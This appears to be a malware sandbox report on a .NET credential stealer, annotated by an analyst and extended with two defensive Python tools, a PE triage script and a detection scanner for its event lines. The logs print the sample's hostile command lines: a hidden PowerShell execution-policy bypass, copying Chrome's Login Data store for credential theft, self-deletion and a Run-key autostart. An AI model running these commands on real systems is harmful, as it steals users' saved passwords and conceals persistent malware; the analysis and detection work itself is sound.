Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: SKMBT 25032020 Ref- 0000019.exeVirustotal: Detection: 24%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path}
Source: unknownProcess created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path}
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe
Source: unknown; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1'
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path}
Source: unknown; Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path}
Source: unknown; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path}
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Process created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path}
Source: C:\Windows\explorer.exe; Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe
Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe'
Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path}
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe; Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path}
Note on the PowerShell command line: -windo 1 is the abbreviated -WindowStyle with value 1 (Hidden), -noexit keeps the host resident, -exec bypass is -ExecutionPolicy Bypass, and the script is staged in C:\Users\Public, which every local account can write to. The same command line is launched both by the original sample and by the dropped Cookies7n1p8js.exe, and wscript.exe then deletes the original sample from the Desktop and copies the Chrome Login Data SQLite store to %TEMP%\DB1 for credential extraction.
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
(This CLSID is the WScript.Shell object, which fits the wscript.exe activity recorded elsewhere in this report.)
Writes ini files
Source: C:\Windows\SysWOW64\wscript.exe; File written: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogri.ini
Found graphical window changes (likely an installer)
Source: Window Recorder; Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
(Signature caveat: mscorrc.dll is the .NET Framework 4 CLR resource library that any managed host such as powershell.exe loads; it is not Silverlight-specific, so this signature carries no weight on its own.)
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\wscript.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
(This Outlook profile key stores mail account settings; read together with the Chrome Login Data copy above, it points to credential harvesting rather than a simple Office presence check.)
PE file contains a COM descriptor data directory
Source: SKMBT 25032020 Ref- 0000019.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: SKMBT 25032020 Ref- 0000019.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: explorer.pdbUGP source: Cookies7n1p8js.exe, 00000015.00000002.1352349999.0000000002750000.00000040.00000001.sdmp
Source: Binary string: wscript.pdbGCTL source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.927343543.00000000019C0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.880956689.0000000007010000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.928565433.0000000001B1F000.00000040.00000001.sdmp, Cookies7n1p8js.exe, 00000015.00000002.1349336799.0000000000B50000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.928565433.0000000001B1F000.00000040.00000001.sdmp, Cookies7n1p8js.exe
Source: Binary string: wscript.pdb source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.927343543.00000000019C0000.00000040.00000001.sdmp
Source: Binary string: explorer.pdb source: Cookies7n1p8js.exe, 00000015.00000002.1352349999.0000000002750000.00000040.00000001.sdmp
(These are the debug strings of Windows binaries, wscript.exe, explorer.exe and ntdll.dll, found in memory dumps of the sample processes rather than symbols the sample ships itself; their presence in executable-writable regions (protection 00000040) of the sample is consistent with the sample mapping copies of those images before handing execution to wscript.exe and explorer.exe.)

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe; Unpacked PE file: 21.2.Cookies7n1p8js.exe.400000.0.unpack .text:ER;.reloc:R;.rsrc:R; vs .text:ER;
.NET source code contains potential unpacker
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.cs; .Net Code: \x06 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.cs; .Net Code: \x06 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
(Assembly.Load(byte[]) maps a managed assembly straight from a memory buffer, so the next stage never has to be written to disk. The same obfuscated class name and call in both the original sample and the dropped Cookies7n1p8js.exe, together with the identical push/ret patterns at matching offsets below, suggest the dropped file is a copy of the same packed payload.)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C2718 push edi; ret 0_2_001C27E8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C220C push edi; ret 0_2_001C22DC
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C3E02 push edi; ret 0_2_001C3F8C
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C2A20 push edi; ret 0_2_001C2AF0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C2C74 push edi; ret 0_2_001C2D44
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C6162 push edi; ret 0_2_001C61D0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C3C94 push edi; ret 0_2_001C3D64
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C2B8E push edi; ret 0_2_001C2D44
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C34AC push edi; ret 0_2_001C357C
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C62D8 push edi; ret 0_2_001C63A8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C50F8 push edi; ret 0_2_001C51C8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C5FF4 push edi; ret 0_2_001C60C4
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C39E8 push edi; ret 0_2_001C3AB8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 0_2_001C2DE2 push edi; ret 0_2_001C2FFC
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF34AC push edi; ret 4_2_00AF357C
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF2B8E push edi; ret 4_2_00AF2D44
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF3C94 push edi; ret 4_2_00AF3D64
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF39E8 push edi; ret 4_2_00AF3AB8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF2DE2 push edi; ret 4_2_00AF2FFC
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF50F8 push edi; ret 4_2_00AF51C8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF5FF4 push edi; ret 4_2_00AF60C4
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF62D8 push edi; ret 4_2_00AF63A8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF2A20 push edi; ret 4_2_00AF2AF0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF220C push edi; ret 4_2_00AF22DC
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF3E02 push edi; ret 4_2_00AF3F8C
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF2718 push edi; ret 4_2_00AF27E8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF6162 push edi; ret 4_2_00AF61D0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 4_2_00AF2C74 push edi; ret 4_2_00AF2D44
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 5_2_004181D8 push esi; retf 5_2_004181DA
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 5_2_00419A35 push eax; ret 5_2_00419A88
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Code function: 5_2_00419AEC push eax; ret 5_2_00419AF2
Binary may include packed or encrypted code
Source: initial sample; Static PE information: section name: .text entropy: 7.91221465963
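The three static signatures in this report (the COM descriptor data directory, the DllCharacteristics flags NO_SEH / TERMINAL_SERVER_AWARE / DYNAMIC_BASE / NX_COMPAT, and the .text entropy of 7.91) can be reproduced on any PE without a sandbox. The following is an added example and is not Joe Sandbox code or part of the analysed sample: a dependency-free Python triage routine that parses the COFF and optional headers and the section table, decodes DllCharacteristics, checks whether data directory 14 (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, the CLR header that marks a .NET image) is populated, and computes Shannon entropy per section. build_sample_pe constructs a minimal synthetic PE32 so the block runs offline; the 7.0 packed-entropy threshold is an assumed triage cut-off, not a specification value, and the sample's own 7.91 would exceed it.

```python
import math
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
COM_DESCRIPTOR_INDEX = 14       # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (CLR header)
PACKED_ENTROPY_THRESHOLD = 7.0  # assumed triage cut-off, not a specification value


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage_pe(data: bytes) -> dict:
    """Parse the COFF/optional headers and section table with the standard library only."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    size_opt, = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    dll_chars, = struct.unpack_from("<H", data, opt + 70)    # same offset in PE32 and PE32+
    dir_base = opt + (112 if magic == 0x20B else 96)         # start of the data directories
    num_dirs, = struct.unpack_from("<I", data, dir_base - 4)  # NumberOfRvaAndSizes
    clr_rva = clr_size = 0
    if num_dirs > COM_DESCRIPTOR_INDEX:
        clr_rva, clr_size = struct.unpack_from("<II", data, dir_base + 8 * COM_DESCRIPTOR_INDEX)
    sections = []
    for i in range(num_sections):
        off = opt + size_opt + 40 * i                         # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "size": raw_size,
                         "entropy": round(shannon_entropy(raw), 3)})
    return {
        "dll_characteristics": sorted(n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit),
        "has_com_descriptor": bool(clr_rva and clr_size),
        "sections": sections,
        "likely_packed": any(s["entropy"] >= PACKED_ENTROPY_THRESHOLD for s in sections),
    }


def build_sample_pe(text_bytes: bytes, dll_chars: int, clr_rva: int) -> bytes:
    """Constructed minimal PE32 with a single .text section (demo input, not the analysed sample)."""
    num_dirs, e_lfanew = 16, 0x40
    opt_size = 96 + 8 * num_dirs
    raw_ptr = (e_lfanew + 4 + 20 + opt_size + 40 + 0x1FF) & ~0x1FF   # 512-byte file alignment
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)      # PE32 magic
    struct.pack_into("<I", opt, 32, 0x1000)    # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)     # FileAlignment
    struct.pack_into("<H", opt, 68, 2)         # Subsystem: Windows GUI
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, num_dirs)
    struct.pack_into("<II", opt, 96 + 8 * COM_DESCRIPTOR_INDEX, clr_rva, 0x48 if clr_rva else 0)
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text_bytes), 0x2000,
                          len(text_bytes), raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + section).ljust(raw_ptr, b"\0")
    return headers + text_bytes


if __name__ == "__main__":
    # With a path argument triage that file; otherwise triage the constructed .NET-style sample
    # (DllCharacteristics 0x8540 is exactly NO_SEH|TERMINAL_SERVER_AWARE|DYNAMIC_BASE|NX_COMPAT).
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else \
        build_sample_pe(bytes(range(256)) * 8, 0x8540, 0x2008)
    for key, value in triage_pe(blob).items():
        print(f"{key}: {value}")
```

The 0x8540 flag word used for the synthetic sample is the combination this report lists; a populated directory 14 plus high-entropy .text in a file that small is the usual profile of a .NET crypter stub carrying an encrypted payload, which is what the Assembly.Load(byte[]) finding above also indicates.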

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\explorer.exe; File created: C:\Users\user\AppData\Local\Temp\Uchul\Cookies7n1p8js.exe
(Note that the drop is recorded under %LOCALAPPDATA%\Temp\Uchul\ while the process entries above show the same file executing from C:\Program Files (x86)\Uchul\, so both locations should be checked when hunting for this sample.)

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\SysWOW64\wscript.exe; Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EFG4WJ
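The process-creation entries earlier in this section and the Run-key entry just above are the kind of sandbox output a detection engineer turns into rules. The following is an added example, not part of the Joe Sandbox report and not code from the sample: a small Python scanner that reads report lines in the "Source: X; Process created: Y" and "Source: X; Registry value created or modified: Z" shape (the regex also accepts the run-together "Source: XProcess created:" form that HTML extraction produces) and flags the behaviours seen here: PowerShell launched with -exec bypass on a script under C:\Users\Public, cmd.exe copying a browser Login Data store, cmd.exe deleting an executable, wscript.exe spawning cmd.exe, and a value written under CurrentVersion\Run. The embedded sample lines are constructed from entries shown in this report; the rule names are chosen here and are not Joe Sandbox signature names.

```python
import re
from collections import Counter

# Constructed from the Joe Sandbox entries shown in this report (five representative lines)
SAMPLE_EVENTS = r"""
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1'
Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe'
Source: C:\Windows\SysWOW64\wscript.exe; Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EFG4WJ
"""

# Accepts "Source: X; Process created: Y" as well as the extraction form "Source: XProcess created: Y"
EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*;?\s*"
    r"(?P<kind>Process created|Registry value created or modified):\s*(?P<detail>.+)$"
)


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.IGNORECASE) is not None


# Rule names are chosen for this example; each predicate sees (source process, detail text)
PROCESS_RULES = [
    ("powershell_bypass_public_script", lambda src, d:
        _has(r"powershell(?:\.exe)?\b", d)
        and _has(r"-exec(?:utionpolicy)?\s+bypass", d)
        and _has(r"\\Users\\Public\\", d)),
    ("browser_login_db_copy", lambda src, d:
        _has(r"\bcopy\b.*\\Login Data", d)),
    ("cmd_deletes_executable", lambda src, d:
        _has(r"\bcmd\.exe\s+/c\s+del\b.*\.exe", d)),
    ("wscript_spawns_cmd", lambda src, d:
        src.lower().endswith("wscript.exe") and _has(r"\\cmd\.exe\b", d)),
]
REGISTRY_RULES = [
    ("run_key_persistence", lambda src, d:
        _has(r"\\CurrentVersion\\Run(?:Once)?\b", d)),
]


def parse_event(line: str):
    """Split one report line into (source, kind, detail); None for non-event lines."""
    m = EVENT_RE.match(line.strip())
    return (m.group("src"), m.group("kind"), m.group("detail")) if m else None


def scan(lines):
    """Return one hit per (rule, event) pair, keeping the source process for context."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        src, kind, detail = ev
        rules = PROCESS_RULES if kind == "Process created" else REGISTRY_RULES
        for tag, matches in rules:
            if matches(src, detail):
                hits.append({"tag": tag, "source": src, "detail": detail})
    return hits


def summarize(lines) -> Counter:
    """Count hits per rule; an empty Counter means nothing in the lines matched."""
    return Counter(h["tag"] for h in scan(lines))


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS.strip().splitlines()):
        print(f"[{hit['tag']}] {hit['source']} -> {hit['detail'][:80]}")
```

On the five constructed lines the scanner fires once per rule; the del line fires twice because it is both a wscript.exe-to-cmd.exe spawn and a self-deletion, which is the point of keeping rules independent rather than folding them into one pattern. The same predicates map directly onto Sysmon Event ID 1 (CommandLine, ParentImage) and Event ID 13 (TargetObject) fields for use outside the sandbox.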

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
(Caveat: SetErrorMode with NOOPENFILEERRORBOX is also set by legitimate runtimes, and the powershell.exe host reports the same flag below, so this signature is weak on its own. The NOGPFAULTERRORBOX entries from wscript.exe and cmd.exe additionally suppress the crash dialog a faulting process would otherwise show.)
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
